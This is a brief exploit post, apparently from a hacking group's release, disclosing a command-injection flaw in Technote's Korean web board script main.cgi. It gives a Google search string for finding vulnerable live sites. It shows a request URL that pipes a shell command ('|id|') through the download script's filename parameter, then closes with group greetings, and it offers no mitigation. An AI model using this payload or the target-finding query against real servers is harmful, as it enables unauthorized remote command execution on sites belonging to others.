Technote web board products are susceptible to a remote command execution vulnerable that has been around since 2000.
9162575cff330a3a6f5f758112febfe761eec00fa08132654395f203897273d9
Technote Command Excution
Technote Inc. from Korea offers a Site Package which includes a web board.
Previous exploit discovered way back on year 2000 focused on a File
Disclosure Vulnerability
http://www.securityfocus.com/bid/2156/discussion/
However, command execution is also possible using the same vulnerable script.
Example...
google for "allinurl:technote/main.cgi*filename=*"
You'll get something like;
something.co.kr/.../shop.pdf?down_num=5466654&
board=rebarz99&command=down_load&filename=cc.pdf
Change the cc.pdf to some non-existing file and pipe a command
something.co.kr/.../shop.pdf?down_num=5466654&
board=rebarz99&command=down_load&filename=rb9.txt|id|
-RB9
Greetz to PhTeam members PATz, Luvchr|s, Verum, Fed-X, rebarz99, hEps,
ch1m3ra, and others who refused to be mentioned :)